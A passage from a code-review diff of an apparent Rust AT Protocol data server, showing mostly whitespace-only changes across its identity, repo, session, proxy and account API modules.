let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle)
···
174
179
}]
175
180
})).into_response()
176
181
}
182
+
177
183
pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> {
178
184
let expected_prefix = if hostname.contains(':') {
179
185
format!("did:web:{}", hostname.replace(':', "%3A"))
···
242
248
}
243
249
}
244
250
}
251
+
245
252
#[derive(serde::Serialize)]
246
253
#[serde(rename_all = "camelCase")]
247
254
pub struct GetRecommendedDidCredentialsOutput {
···
250
257
pub verification_methods: VerificationMethods,
251
258
pub services: Services,
252
259
}
260
+
253
261
#[derive(serde::Serialize)]
254
262
#[serde(rename_all = "camelCase")]
255
263
pub struct VerificationMethods {
256
264
pub atproto: String,
257
265
}
266
+
258
267
#[derive(serde::Serialize)]
259
268
#[serde(rename_all = "camelCase")]
260
269
pub struct Services {
261
270
pub atproto_pds: AtprotoPds,
262
271
}
272
+
263
273
#[derive(serde::Serialize)]
264
274
#[serde(rename_all = "camelCase")]
265
275
pub struct AtprotoPds {
···
267
277
pub service_type: String,
268
278
pub endpoint: String,
269
279
}
280
+
270
281
pub async fn get_recommended_did_credentials(
271
282
State(state): State<AppState>,
272
283
headers: axum::http::HeaderMap,
···
329
340
)
330
341
.into_response()
331
342
}
343
+
332
344
#[derive(Deserialize)]
333
345
pub struct UpdateHandleInput {
334
346
pub handle: String,
335
347
}
348
+
336
349
pub async fn update_handle(
337
350
State(state): State<AppState>,
338
351
headers: axum::http::HeaderMap,
···
410
423
}
411
424
}
412
425
}
426
+
413
427
pub async fn well_known_atproto_did(
414
428
State(state): State<AppState>,
415
429
headers: HeaderMap,
+1
src/api/identity/mod.rs
+1
src/api/identity/mod.rs
+1
src/api/identity/plc/mod.rs
+1
src/api/identity/plc/mod.rs
+2
src/api/identity/plc/request.rs
+2
src/api/identity/plc/request.rs
···
9
9
use chrono::{Duration, Utc};
10
10
use serde_json::json;
11
11
use tracing::{error, info, warn};
12
+
12
13
fn generate_plc_token() -> String {
13
14
crate::util::generate_token_code()
14
15
}
16
+
15
17
pub async fn request_plc_operation_signature(
16
18
State(state): State<AppState>,
17
19
headers: axum::http::HeaderMap,
+4
src/api/identity/plc/sign.rs
+4
src/api/identity/plc/sign.rs
···
16
16
use serde_json::{json, Value};
17
17
use std::collections::HashMap;
18
18
use tracing::{error, info, warn};
19
+
19
20
#[derive(Debug, Deserialize)]
20
21
#[serde(rename_all = "camelCase")]
21
22
pub struct SignPlcOperationInput {
···
25
26
pub verification_methods: Option<HashMap<String, String>>,
26
27
pub services: Option<HashMap<String, ServiceInput>>,
27
28
}
29
+
28
30
#[derive(Debug, Deserialize, Clone)]
29
31
pub struct ServiceInput {
30
32
#[serde(rename = "type")]
31
33
pub service_type: String,
32
34
pub endpoint: String,
33
35
}
36
+
34
37
#[derive(Debug, Serialize)]
35
38
pub struct SignPlcOperationOutput {
36
39
pub operation: Value,
37
40
}
41
+
38
42
pub async fn sign_plc_operation(
39
43
State(state): State<AppState>,
40
44
headers: axum::http::HeaderMap,
+2
src/api/identity/plc/submit.rs
+2
src/api/identity/plc/submit.rs
···
12
12
use serde::Deserialize;
13
13
use serde_json::{json, Value};
14
14
use tracing::{error, info, warn};
15
+
15
16
#[derive(Debug, Deserialize)]
16
17
pub struct SubmitPlcOperationInput {
17
18
pub operation: Value,
18
19
}
20
+
19
21
pub async fn submit_plc_operation(
20
22
State(state): State<AppState>,
21
23
headers: axum::http::HeaderMap,
+1
src/api/mod.rs
+1
src/api/mod.rs
+3
src/api/moderation/mod.rs
+3
src/api/moderation/mod.rs
···
9
9
use serde::{Deserialize, Serialize};
10
10
use serde_json::{Value, json};
11
11
use tracing::error;
12
+
12
13
#[derive(Deserialize)]
13
14
#[serde(rename_all = "camelCase")]
14
15
pub struct CreateReportInput {
···
16
17
pub reason: Option<String>,
17
18
pub subject: Value,
18
19
}
20
+
19
21
#[derive(Serialize)]
20
22
#[serde(rename_all = "camelCase")]
21
23
pub struct CreateReportOutput {
···
26
28
pub reported_by: String,
27
29
pub created_at: String,
28
30
}
31
+
29
32
pub async fn create_report(
30
33
State(state): State<AppState>,
31
34
headers: axum::http::HeaderMap,
+1
src/api/notification/mod.rs
+1
src/api/notification/mod.rs
+3
src/api/notification/register_push.rs
+3
src/api/notification/register_push.rs
···
10
10
use serde::Deserialize;
11
11
use serde_json::json;
12
12
use tracing::{error, info};
13
+
13
14
#[derive(Deserialize)]
14
15
#[serde(rename_all = "camelCase")]
15
16
pub struct RegisterPushInput {
···
18
19
pub platform: String,
19
20
pub app_id: String,
20
21
}
22
+
21
23
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
24
+
22
25
pub async fn register_push(
23
26
State(state): State<AppState>,
24
27
headers: HeaderMap,
+4
src/api/notification_prefs.rs
+4
src/api/notification_prefs.rs
···
10
10
use tracing::info;
11
11
use crate::auth::validate_bearer_token;
12
12
use crate::state::AppState;
13
+
13
14
#[derive(Serialize)]
14
15
#[serde(rename_all = "camelCase")]
15
16
pub struct NotificationPrefsResponse {
···
22
23
pub signal_number: Option<String>,
23
24
pub signal_verified: bool,
24
25
}
26
+
25
27
pub async fn get_notification_prefs(
26
28
State(state): State<AppState>,
27
29
headers: HeaderMap,
···
96
98
})
97
99
.into_response()
98
100
}
101
+
99
102
#[derive(Deserialize)]
100
103
#[serde(rename_all = "camelCase")]
101
104
pub struct UpdateNotificationPrefsInput {
···
104
107
pub telegram_username: Option<String>,
105
108
pub signal_number: Option<String>,
106
109
}
110
+
107
111
pub async fn update_notification_prefs(
108
112
State(state): State<AppState>,
109
113
headers: HeaderMap,
+1
src/api/proxy.rs
+1
src/api/proxy.rs
+15
src/api/proxy_client.rs
+15
src/api/proxy_client.rs
···
3
3
use std::sync::OnceLock;
4
4
use std::time::Duration;
5
5
use tracing::warn;
6
+
6
7
pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10);
7
8
pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30);
8
9
pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5);
9
10
pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024;
11
+
10
12
static PROXY_CLIENT: OnceLock<Client> = OnceLock::new();
13
+
11
14
pub fn proxy_client() -> &'static Client {
12
15
PROXY_CLIENT.get_or_init(|| {
13
16
ClientBuilder::new()
···
20
23
.expect("Failed to build HTTP client - this indicates a TLS or system configuration issue")
21
24
})
22
25
}
26
+
23
27
pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> {
24
28
let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?;
25
29
let scheme = parsed.scheme();
···
61
65
}
62
66
Ok(())
63
67
}
68
+
64
69
fn is_unicast_ip(ip: &IpAddr) -> bool {
65
70
match ip {
66
71
IpAddr::V4(v4) => {
···
74
79
IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(),
75
80
}
76
81
}
82
+
77
83
fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool {
78
84
let octets = ip.octets();
79
85
octets[0] == 10
···
81
87
|| (octets[0] == 192 && octets[1] == 168)
82
88
|| (octets[0] == 169 && octets[1] == 254)
83
89
}
90
+
84
91
#[derive(Debug, Clone)]
85
92
pub enum SsrfError {
86
93
InvalidUrl,
···
89
96
NonUnicastIp(String),
90
97
DnsResolutionFailed(String),
91
98
}
99
+
92
100
impl std::fmt::Display for SsrfError {
93
101
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
94
102
match self {
···
100
108
}
101
109
}
102
110
}
111
+
103
112
impl std::error::Error for SsrfError {}
113
+
104
114
pub const HEADERS_TO_FORWARD: &[&str] = &[
105
115
"accept-language",
106
116
"atproto-accept-labelers",
···
112
122
"retry-after",
113
123
"content-type",
114
124
];
125
+
115
126
pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> {
116
127
if !uri.starts_with("at://") {
117
128
return Err("URI must start with at://");
···
137
148
rkey: parts.get(2).map(|s| s.to_string()),
138
149
})
139
150
}
151
+
140
152
#[derive(Debug, Clone)]
141
153
pub struct AtUriParts {
142
154
pub did: String,
143
155
pub collection: Option<String>,
144
156
pub rkey: Option<String>,
145
157
}
158
+
146
159
pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 {
147
160
match limit {
148
161
Some(l) if l == 0 => default,
···
151
164
None => default,
152
165
}
153
166
}
167
+
154
168
pub fn validate_did(did: &str) -> Result<(), &'static str> {
155
169
if !did.starts_with("did:") {
156
170
return Err("Invalid DID format");
···
165
179
}
166
180
Ok(())
167
181
}
182
+
168
183
#[cfg(test)]
169
184
mod tests {
170
185
use super::*;
+19
src/api/read_after_write.rs
+19
src/api/read_after_write.rs
···
17
17
use std::collections::HashMap;
18
18
use tracing::{error, info, warn};
19
19
use uuid::Uuid;
20
+
20
21
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
21
22
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
23
+
22
24
#[derive(Debug, Clone, Serialize, Deserialize)]
23
25
#[serde(rename_all = "camelCase")]
24
26
pub struct PostRecord {
···
39
41
#[serde(flatten)]
40
42
pub extra: HashMap<String, Value>,
41
43
}
44
+
42
45
#[derive(Debug, Clone, Serialize, Deserialize)]
43
46
#[serde(rename_all = "camelCase")]
44
47
pub struct ProfileRecord {
···
55
58
#[serde(flatten)]
56
59
pub extra: HashMap<String, Value>,
57
60
}
61
+
58
62
#[derive(Debug, Clone)]
59
63
pub struct RecordDescript<T> {
60
64
pub uri: String,
···
62
66
pub indexed_at: DateTime<Utc>,
63
67
pub record: T,
64
68
}
69
+
65
70
#[derive(Debug, Clone, Serialize, Deserialize)]
66
71
#[serde(rename_all = "camelCase")]
67
72
pub struct LikeRecord {
···
72
77
#[serde(flatten)]
73
78
pub extra: HashMap<String, Value>,
74
79
}
80
+
75
81
#[derive(Debug, Clone, Serialize, Deserialize)]
76
82
#[serde(rename_all = "camelCase")]
77
83
pub struct LikeSubject {
78
84
pub uri: String,
79
85
pub cid: String,
80
86
}
87
+
81
88
#[derive(Debug, Default)]
82
89
pub struct LocalRecords {
83
90
pub count: usize,
···
85
92
pub posts: Vec<RecordDescript<PostRecord>>,
86
93
pub likes: Vec<RecordDescript<LikeRecord>>,
87
94
}
95
+
88
96
pub async fn get_records_since_rev(
89
97
state: &AppState,
90
98
did: &str,
···
187
195
}
188
196
Ok(result)
189
197
}
198
+
190
199
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
191
200
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
192
201
for post in &local.posts {
···
205
214
}
206
215
oldest.map(|o| (Utc::now() - o).num_milliseconds())
207
216
}
217
+
208
218
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
209
219
headers
210
220
.get(REPO_REV_HEADER)
211
221
.and_then(|h| h.to_str().ok())
212
222
.map(|s| s.to_string())
213
223
}
224
+
214
225
#[derive(Debug)]
215
226
pub struct ProxyResponse {
216
227
pub status: StatusCode,
217
228
pub headers: HeaderMap,
218
229
pub body: bytes::Bytes,
219
230
}
231
+
220
232
pub async fn proxy_to_appview(
221
233
method: &str,
222
234
params: &HashMap<String, String>,
···
297
309
}
298
310
}
299
311
}
312
+
300
313
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
301
314
let mut response = (StatusCode::OK, Json(data)).into_response();
302
315
if let Some(lag_ms) = lag {
···
308
321
}
309
322
response
310
323
}
324
+
311
325
#[derive(Debug, Clone, Serialize, Deserialize)]
312
326
#[serde(rename_all = "camelCase")]
313
327
pub struct AuthorView {
···
320
334
#[serde(flatten)]
321
335
pub extra: HashMap<String, Value>,
322
336
}
337
+
323
338
#[derive(Debug, Clone, Serialize, Deserialize)]
324
339
#[serde(rename_all = "camelCase")]
325
340
pub struct PostView {
···
341
356
#[serde(flatten)]
342
357
pub extra: HashMap<String, Value>,
343
358
}
359
+
344
360
#[derive(Debug, Clone, Serialize, Deserialize)]
345
361
#[serde(rename_all = "camelCase")]
346
362
pub struct FeedViewPost {
···
354
370
#[serde(flatten)]
355
371
pub extra: HashMap<String, Value>,
356
372
}
373
+
357
374
#[derive(Debug, Clone, Serialize, Deserialize)]
358
375
pub struct FeedOutput {
359
376
pub feed: Vec<FeedViewPost>,
360
377
#[serde(skip_serializing_if = "Option::is_none")]
361
378
pub cursor: Option<String>,
362
379
}
380
+
363
381
pub fn format_local_post(
364
382
descript: &RecordDescript<PostRecord>,
365
383
author_did: &str,
···
387
405
extra: HashMap::new(),
388
406
}
389
407
}
408
+
390
409
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
391
410
if posts.is_empty() {
392
411
return;
+7
src/api/repo/blob.rs
+7
src/api/repo/blob.rs
···
14
14
use sha2::{Digest, Sha256};
15
15
use std::str::FromStr;
16
16
use tracing::error;
17
+
17
18
const MAX_BLOB_SIZE: usize = 1_000_000;
19
+
18
20
pub async fn upload_blob(
19
21
State(state): State<AppState>,
20
22
headers: axum::http::HeaderMap,
···
154
156
}))
155
157
.into_response()
156
158
}
159
+
157
160
#[derive(Deserialize)]
158
161
pub struct ListMissingBlobsParams {
159
162
pub limit: Option<i64>,
160
163
pub cursor: Option<String>,
161
164
}
165
+
162
166
#[derive(Serialize)]
163
167
#[serde(rename_all = "camelCase")]
164
168
pub struct RecordBlob {
165
169
pub cid: String,
166
170
pub record_uri: String,
167
171
}
172
+
168
173
#[derive(Serialize)]
169
174
pub struct ListMissingBlobsOutput {
170
175
pub cursor: Option<String>,
171
176
pub blobs: Vec<RecordBlob>,
172
177
}
178
+
173
179
fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) {
174
180
if let Some(obj) = val.as_object() {
175
181
if let Some(type_val) = obj.get("$type") {
···
192
198
}
193
199
}
194
200
}
201
+
195
202
pub async fn list_missing_blobs(
196
203
State(state): State<AppState>,
197
204
headers: axum::http::HeaderMap,
+3
src/api/repo/import.rs
+3
src/api/repo/import.rs
···
11
11
};
12
12
use serde_json::json;
13
13
use tracing::{debug, error, info, warn};
14
+
14
15
const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024;
15
16
const DEFAULT_MAX_BLOCKS: usize = 50000;
17
+
16
18
pub async fn import_repo(
17
19
State(state): State<AppState>,
18
20
headers: axum::http::HeaderMap,
···
355
357
}
356
358
}
357
359
}
360
+
358
361
async fn sequence_import_event(
359
362
state: &AppState,
360
363
did: &str,
+2
src/api/repo/meta.rs
+2
src/api/repo/meta.rs
+1
src/api/repo/mod.rs
+1
src/api/repo/mod.rs
+7
src/api/repo/record/batch.rs
+7
src/api/repo/record/batch.rs
···
17
17
use std::str::FromStr;
18
18
use std::sync::Arc;
19
19
use tracing::error;
20
+
20
21
const MAX_BATCH_WRITES: usize = 200;
22
+
21
23
#[derive(Deserialize)]
22
24
#[serde(tag = "$type")]
23
25
pub enum WriteOp {
···
36
38
#[serde(rename = "com.atproto.repo.applyWrites#delete")]
37
39
Delete { collection: String, rkey: String },
38
40
}
41
+
39
42
#[derive(Deserialize)]
40
43
#[serde(rename_all = "camelCase")]
41
44
pub struct ApplyWritesInput {
···
44
47
pub writes: Vec<WriteOp>,
45
48
pub swap_commit: Option<String>,
46
49
}
50
+
47
51
#[derive(Serialize)]
48
52
#[serde(tag = "$type")]
49
53
pub enum WriteResult {
···
54
58
#[serde(rename = "com.atproto.repo.applyWrites#deleteResult")]
55
59
DeleteResult {},
56
60
}
61
+
57
62
#[derive(Serialize)]
58
63
pub struct ApplyWritesOutput {
59
64
pub commit: CommitInfo,
60
65
pub results: Vec<WriteResult>,
61
66
}
67
+
62
68
#[derive(Serialize)]
63
69
pub struct CommitInfo {
64
70
pub cid: String,
65
71
pub rev: String,
66
72
}
73
+
67
74
pub async fn apply_writes(
68
75
State(state): State<AppState>,
69
76
headers: axum::http::HeaderMap,
+2
src/api/repo/record/delete.rs
+2
src/api/repo/record/delete.rs
···
16
16
use std::str::FromStr;
17
17
use std::sync::Arc;
18
18
use tracing::error;
19
+
19
20
#[derive(Deserialize)]
20
21
pub struct DeleteRecordInput {
21
22
pub repo: String,
···
26
27
#[serde(rename = "swapCommit")]
27
28
pub swap_commit: Option<String>,
28
29
}
30
+
29
31
pub async fn delete_record(
30
32
State(state): State<AppState>,
31
33
headers: HeaderMap,
+1
src/api/repo/record/mod.rs
+1
src/api/repo/record/mod.rs
+2
src/api/repo/record/read.rs
+2
src/api/repo/record/read.rs
···
12
12
use std::collections::HashMap;
13
13
use std::str::FromStr;
14
14
use tracing::error;
15
+
15
16
#[derive(Deserialize)]
16
17
pub struct GetRecordInput {
17
18
pub repo: String,
···
19
20
pub rkey: String,
20
21
pub cid: Option<String>,
21
22
}
23
+
22
24
pub async fn get_record(
23
25
State(state): State<AppState>,
24
26
Query(input): Query<GetRecordInput>,
+4
src/api/repo/record/utils.rs
+4
src/api/repo/record/utils.rs
···
28
28
rev: &'a str,
29
29
version: i64,
30
30
}
31
+
31
32
fn create_signed_commit(
32
33
did: &str,
33
34
data: Cid,
···
68
69
.map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?;
69
70
Ok((signed_bytes, sig_bytes))
70
71
}
72
+
71
73
pub enum RecordOp {
72
74
Create { collection: String, rkey: String, cid: Cid },
73
75
Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> },
74
76
Delete { collection: String, rkey: String, prev: Option<Cid> },
75
77
}
78
+
76
79
pub struct CommitResult {
77
80
pub commit_cid: Cid,
78
81
pub rev: String,
79
82
}
83
+
80
84
pub async fn commit_and_log(
81
85
state: &AppState,
82
86
did: &str,
+1
src/api/repo/record/validation.rs
+1
src/api/repo/record/validation.rs
+2
src/api/repo/record/write.rs
+2
src/api/repo/record/write.rs
···
18
18
use std::sync::Arc;
19
19
use tracing::error;
20
20
use uuid::Uuid;
21
+
21
22
pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
22
23
let row = sqlx::query(
23
24
r#"
···
44
45
None => Ok(false),
45
46
}
46
47
}
48
+
47
49
pub async fn prepare_repo_write(
48
50
state: &AppState,
49
51
headers: &HeaderMap,
+8
src/api/server/account_status.rs
+8
src/api/server/account_status.rs
···
12
12
use serde_json::json;
13
13
use tracing::{error, info, warn};
14
14
use uuid::Uuid;
15
+
15
16
#[derive(Serialize)]
16
17
#[serde(rename_all = "camelCase")]
17
18
pub struct CheckAccountStatusOutput {
···
25
26
pub expected_blobs: i64,
26
27
pub imported_blobs: i64,
27
28
}
29
+
28
30
pub async fn check_account_status(
29
31
State(state): State<AppState>,
30
32
headers: axum::http::HeaderMap,
···
94
96
)
95
97
.into_response()
96
98
}
99
+
97
100
pub async fn activate_account(
98
101
State(state): State<AppState>,
99
102
headers: axum::http::HeaderMap,
···
133
136
}
134
137
}
135
138
}
139
+
136
140
#[derive(Deserialize)]
137
141
#[serde(rename_all = "camelCase")]
138
142
pub struct DeactivateAccountInput {
139
143
pub delete_after: Option<String>,
140
144
}
145
+
141
146
pub async fn deactivate_account(
142
147
State(state): State<AppState>,
143
148
headers: axum::http::HeaderMap,
···
178
183
}
179
184
}
180
185
}
186
+
181
187
pub async fn request_account_delete(
182
188
State(state): State<AppState>,
183
189
headers: axum::http::HeaderMap,
···
232
238
info!("Account deletion requested for user {}", did);
233
239
(StatusCode::OK, Json(json!({}))).into_response()
234
240
}
241
+
235
242
#[derive(Deserialize)]
236
243
pub struct DeleteAccountInput {
237
244
pub did: String,
238
245
pub password: String,
239
246
pub token: String,
240
247
}
248
+
241
249
pub async fn delete_account(
242
250
State(state): State<AppState>,
243
251
Json(input): Json<DeleteAccountInput>,
+8
src/api/server/app_password.rs
+8
src/api/server/app_password.rs
···
11
11
use serde::{Deserialize, Serialize};
12
12
use serde_json::json;
13
13
use tracing::{error, warn};
14
+
14
15
#[derive(Serialize)]
15
16
#[serde(rename_all = "camelCase")]
16
17
pub struct AppPassword {
···
18
19
pub created_at: String,
19
20
pub privileged: bool,
20
21
}
22
+
21
23
#[derive(Serialize)]
22
24
pub struct ListAppPasswordsOutput {
23
25
pub passwords: Vec<AppPassword>,
24
26
}
27
+
25
28
pub async fn list_app_passwords(
26
29
State(state): State<AppState>,
27
30
BearerAuth(auth_user): BearerAuth,
···
54
57
}
55
58
}
56
59
}
60
+
57
61
#[derive(Deserialize)]
58
62
pub struct CreateAppPasswordInput {
59
63
pub name: String,
60
64
pub privileged: Option<bool>,
61
65
}
66
+
62
67
#[derive(Serialize)]
63
68
#[serde(rename_all = "camelCase")]
64
69
pub struct CreateAppPasswordOutput {
···
67
72
pub created_at: String,
68
73
pub privileged: bool,
69
74
}
75
+
70
76
pub async fn create_app_password(
71
77
State(state): State<AppState>,
72
78
headers: HeaderMap,
···
146
152
}
147
153
}
148
154
}
155
+
149
156
#[derive(Deserialize)]
150
157
pub struct RevokeAppPasswordInput {
151
158
pub name: String,
152
159
}
160
+
153
161
pub async fn revoke_app_password(
154
162
State(state): State<AppState>,
155
163
BearerAuth(auth_user): BearerAuth,
+7
src/api/server/email.rs
+7
src/api/server/email.rs
···
10
10
use serde::Deserialize;
11
11
use serde_json::json;
12
12
use tracing::{error, info, warn};
13
+
13
14
fn generate_confirmation_code() -> String {
14
15
crate::util::generate_token_code()
15
16
}
17
+
16
18
#[derive(Deserialize)]
17
19
#[serde(rename_all = "camelCase")]
18
20
pub struct RequestEmailUpdateInput {
19
21
pub email: String,
20
22
}
23
+
21
24
pub async fn request_email_update(
22
25
State(state): State<AppState>,
23
26
headers: axum::http::HeaderMap,
···
119
122
info!("Email update requested for user {}", user_id);
120
123
(StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response()
121
124
}
125
+
122
126
#[derive(Deserialize)]
123
127
#[serde(rename_all = "camelCase")]
124
128
pub struct ConfirmEmailInput {
125
129
pub email: String,
126
130
pub token: String,
127
131
}
132
+
128
133
pub async fn confirm_email(
129
134
State(state): State<AppState>,
130
135
headers: axum::http::HeaderMap,
···
236
241
info!("Email updated for user {}", user_id);
237
242
(StatusCode::OK, Json(json!({}))).into_response()
238
243
}
244
+
239
245
#[derive(Deserialize)]
240
246
#[serde(rename_all = "camelCase")]
241
247
pub struct UpdateEmailInput {
···
244
250
pub email_auth_factor: Option<bool>,
245
251
pub token: Option<String>,
246
252
}
253
+
247
254
pub async fn update_email(
248
255
State(state): State<AppState>,
249
256
headers: axum::http::HeaderMap,
+12
src/api/server/invite.rs
+12
src/api/server/invite.rs
···
10
10
use serde::{Deserialize, Serialize};
11
11
use tracing::error;
12
12
use uuid::Uuid;
13
+
13
14
#[derive(Deserialize)]
14
15
#[serde(rename_all = "camelCase")]
15
16
pub struct CreateInviteCodeInput {
16
17
pub use_count: i32,
17
18
pub for_account: Option<String>,
18
19
}
20
+
19
21
#[derive(Serialize)]
20
22
pub struct CreateInviteCodeOutput {
21
23
pub code: String,
22
24
}
25
+
23
26
pub async fn create_invite_code(
24
27
State(state): State<AppState>,
25
28
BearerAuth(auth_user): BearerAuth,
···
81
84
}
82
85
}
83
86
}
87
+
84
88
#[derive(Deserialize)]
85
89
#[serde(rename_all = "camelCase")]
86
90
pub struct CreateInviteCodesInput {
···
88
92
pub use_count: i32,
89
93
pub for_accounts: Option<Vec<String>>,
90
94
}
95
+
91
96
#[derive(Serialize)]
92
97
pub struct CreateInviteCodesOutput {
93
98
pub codes: Vec<AccountCodes>,
94
99
}
100
+
95
101
#[derive(Serialize)]
96
102
pub struct AccountCodes {
97
103
pub account: String,
98
104
pub codes: Vec<String>,
99
105
}
106
+
100
107
pub async fn create_invite_codes(
101
108
State(state): State<AppState>,
102
109
BearerAuth(auth_user): BearerAuth,
···
172
179
}
173
180
Json(CreateInviteCodesOutput { codes: result_codes }).into_response()
174
181
}
182
+
175
183
#[derive(Deserialize)]
176
184
#[serde(rename_all = "camelCase")]
177
185
pub struct GetAccountInviteCodesParams {
178
186
pub include_used: Option<bool>,
179
187
pub create_available: Option<bool>,
180
188
}
189
+
181
190
#[derive(Serialize)]
182
191
#[serde(rename_all = "camelCase")]
183
192
pub struct InviteCode {
···
189
198
pub created_at: String,
190
199
pub uses: Vec<InviteCodeUse>,
191
200
}
201
+
192
202
#[derive(Serialize)]
193
203
#[serde(rename_all = "camelCase")]
194
204
pub struct InviteCodeUse {
195
205
pub used_by: String,
196
206
pub used_at: String,
197
207
}
208
+
198
209
#[derive(Serialize)]
199
210
pub struct GetAccountInviteCodesOutput {
200
211
pub codes: Vec<InviteCode>,
201
212
}
213
+
202
214
pub async fn get_account_invite_codes(
203
215
State(state): State<AppState>,
204
216
BearerAuth(auth_user): BearerAuth,
+1
src/api/server/mod.rs
+1
src/api/server/mod.rs
+5
src/api/server/password.rs
+5
src/api/server/password.rs
···
10
10
use serde::Deserialize;
11
11
use serde_json::json;
12
12
use tracing::{error, info, warn};
13
+
13
14
fn generate_reset_code() -> String {
14
15
crate::util::generate_token_code()
15
16
}
···
28
29
}
29
30
"unknown".to_string()
30
31
}
32
+
31
33
#[derive(Deserialize)]
32
34
pub struct RequestPasswordResetInput {
33
35
pub email: String,
34
36
}
37
+
35
38
pub async fn request_password_reset(
36
39
State(state): State<AppState>,
37
40
headers: HeaderMap,
···
102
105
info!("Password reset requested for user {}", user_id);
103
106
(StatusCode::OK, Json(json!({}))).into_response()
104
107
}
108
+
105
109
#[derive(Deserialize)]
106
110
pub struct ResetPasswordInput {
107
111
pub token: String,
108
112
pub password: String,
109
113
}
114
+
110
115
pub async fn reset_password(
111
116
State(state): State<AppState>,
112
117
headers: HeaderMap,
+3
src/api/server/service_auth.rs
+3
src/api/server/service_auth.rs
···
9
9
use serde::{Deserialize, Serialize};
10
10
use serde_json::json;
11
11
use tracing::error;
12
+
12
13
#[derive(Deserialize)]
13
14
pub struct GetServiceAuthParams {
14
15
pub aud: String,
15
16
pub lxm: Option<String>,
16
17
pub exp: Option<i64>,
17
18
}
19
+
18
20
#[derive(Serialize)]
19
21
pub struct GetServiceAuthOutput {
20
22
pub token: String,
21
23
}
24
+
22
25
pub async fn get_service_auth(
23
26
State(state): State<AppState>,
24
27
headers: axum::http::HeaderMap,
+12
src/api/server/session.rs
+12
src/api/server/session.rs
···
12
12
use serde::{Deserialize, Serialize};
13
13
use serde_json::json;
14
14
use tracing::{error, info, warn};
15
+
15
16
fn extract_client_ip(headers: &HeaderMap) -> String {
16
17
if let Some(forwarded) = headers.get("x-forwarded-for") {
17
18
if let Ok(value) = forwarded.to_str() {
···
27
28
}
28
29
"unknown".to_string()
29
30
}
31
+
30
32
#[derive(Deserialize)]
31
33
pub struct CreateSessionInput {
32
34
pub identifier: String,
33
35
pub password: String,
34
36
}
37
+
35
38
#[derive(Serialize)]
36
39
#[serde(rename_all = "camelCase")]
37
40
pub struct CreateSessionOutput {
···
40
43
pub handle: String,
41
44
pub did: String,
42
45
}
46
+
43
47
pub async fn create_session(
44
48
State(state): State<AppState>,
45
49
headers: HeaderMap,
···
155
159
did: row.did,
156
160
}).into_response()
157
161
}
162
+
158
163
pub async fn get_session(
159
164
State(state): State<AppState>,
160
165
BearerAuth(auth_user): BearerAuth,
···
194
199
}
195
200
}
196
201
}
202
+
197
203
pub async fn delete_session(
198
204
State(state): State<AppState>,
199
205
headers: axum::http::HeaderMap,
···
227
233
}
228
234
}
229
235
}
236
+
230
237
pub async fn refresh_session(
231
238
State(state): State<AppState>,
232
239
headers: axum::http::HeaderMap,
···
395
402
}
396
403
}
397
404
}
405
+
398
406
#[derive(Deserialize)]
399
407
#[serde(rename_all = "camelCase")]
400
408
pub struct ConfirmSignupInput {
401
409
pub did: String,
402
410
pub verification_code: String,
403
411
}
412
+
404
413
#[derive(Serialize)]
405
414
#[serde(rename_all = "camelCase")]
406
415
pub struct ConfirmSignupOutput {
···
413
422
pub preferred_channel: String,
414
423
pub preferred_channel_verified: bool,
415
424
}
425
+
416
426
pub async fn confirm_signup(
417
427
State(state): State<AppState>,
418
428
Json(input): Json<ConfirmSignupInput>,
···
535
545
preferred_channel_verified: true,
536
546
}).into_response()
537
547
}
548
+
538
549
#[derive(Deserialize)]
539
550
#[serde(rename_all = "camelCase")]
540
551
pub struct ResendVerificationInput {
541
552
pub did: String,
542
553
}
554
+
543
555
pub async fn resend_verification(
544
556
State(state): State<AppState>,
545
557
Json(input): Json<ResendVerificationInput>,
+5
src/api/server/signing_key.rs
+5
src/api/server/signing_key.rs
···
10
10
use serde::{Deserialize, Serialize};
11
11
use serde_json::json;
12
12
use tracing::{error, info};
13
+
13
14
const SECP256K1_MULTICODEC_PREFIX: [u8; 2] = [0xe7, 0x01];
15
+
14
16
fn public_key_to_did_key(signing_key: &SigningKey) -> String {
15
17
let verifying_key = signing_key.verifying_key();
16
18
let compressed_pubkey = verifying_key.to_sec1_bytes();
···
20
22
let encoded = multibase::encode(multibase::Base::Base58Btc, &multicodec_key);
21
23
format!("did:key:{}", encoded)
22
24
}
25
+
23
26
#[derive(Deserialize)]
24
27
pub struct ReserveSigningKeyInput {
25
28
pub did: Option<String>,
26
29
}
30
+
27
31
#[derive(Serialize)]
28
32
#[serde(rename_all = "camelCase")]
29
33
pub struct ReserveSigningKeyOutput {
30
34
pub signing_key: String,
31
35
}
36
+
32
37
pub async fn reserve_signing_key(
33
38
State(state): State<AppState>,
34
39
Json(input): Json<ReserveSigningKeyInput>,
+2
src/api/temp.rs
+2
src/api/temp.rs
···
8
8
use serde_json::json;
9
9
use crate::auth::{extract_bearer_token_from_header, validate_bearer_token};
10
10
use crate::state::AppState;
11
+
11
12
#[derive(Serialize)]
12
13
